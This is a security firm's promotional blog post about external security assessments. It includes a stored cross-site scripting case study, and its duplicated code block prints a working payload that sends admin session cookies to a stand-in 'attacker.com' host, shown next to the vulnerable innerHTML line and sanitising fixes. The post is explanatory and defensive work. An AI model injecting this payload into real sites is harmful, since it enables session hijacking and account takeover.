Getting a Security Assessment: What to Expect and Why It Matters
During a recent assessment for a startup in Coeur d'Alene, we found five exploitable vulnerabilities in under 45 minutes - including a stored Cross-Site Scripting flaw that would have allowed an attacker to silently hijack any admin session on the platform.
The startup's CTO had built the application himself. He was skilled, thorough, and genuinely careful. He just wasn't looking at it from an adversary's perspective. That's the entire point of an external assessment.
What We Test
- External attack surface - what's exposed to the internet, open ports, software versions, subdomain enumeration
- Web application vulnerabilities - OWASP Top 10 and beyond
- SSL/TLS configuration - protocol support, cipher strength, certificate validity
- Security headers - HTTP headers that prevent clickjacking, content injection, and MIME sniffing
- DNS configuration - SPF, DKIM, DMARC email spoofing protections, zone transfer exposure
- Sensitive path exposure - admin panels, backup files, config files accessible without authentication
A Real Finding: Stored XSS (OWASP A03 - Injection)
On the Coeur d'Alene startup engagement, a user profile bio field was rendering unsanitized HTML. We injected a payload that silently exfiltrated session cookies from any admin who viewed the profile:
<!-- Payload injected into "bio" field in user profile -->
<img src=x onerror="fetch('https://attacker.com/steal?c='+btoa(document.cookie))">
<!-- When an admin views the profile page, their session cookie
is silently POSTed to the attacker's server. No interaction required. -->
// Vulnerable code (React/JS):
element.innerHTML = userData.bio; // Never do this with untrusted input
// Safe alternatives:
element.textContent = userData.bio; // Plain text, no HTML rendered
// Or if HTML is required, sanitize first:
import DOMPurify from 'dompurify';
element.innerHTML = DOMPurify.sanitize(userData.bio);<!-- Payload injected into "bio" field in user profile -->
<img src=x onerror="fetch('https://attacker.com/steal?c='+btoa(document.cookie))">
<!-- When an admin views the profile page, their session cookie
is silently POSTed to the attacker's server. No interaction required. -->
// Vulnerable code (React/JS):
element.innerHTML = userData.bio; // Never do this with untrusted input
// Safe alternatives:
element.textContent = userData.bio; // Plain text, no HTML rendered
// Or if HTML is required, sanitize first:
import DOMPurify from 'dompurify';
element.innerHTML = DOMPurify.sanitize(userData.bio);What the Report Looks Like
Every finding in a Blackhount report includes:
- The exact URL or system affected
- Severity rating (Critical / High / Medium / Low) with justification
- Evidence - a screenshot, HTTP request/response, or code snippet proving the issue is real and exploitable
- Concrete remediation steps written in plain language - no security degree required
How Often?
At minimum annually - and after any major launch, infrastructure change, or significant team growth. For businesses handling payment or health data, more frequently. Start with a free assessment - two minutes, no commitment, honest results.
Have questions about your security posture?
Blackhount offers free security assessments for Idaho businesses. No commitment, no jargon - just honest answers about what we find.
Get a Free Assessment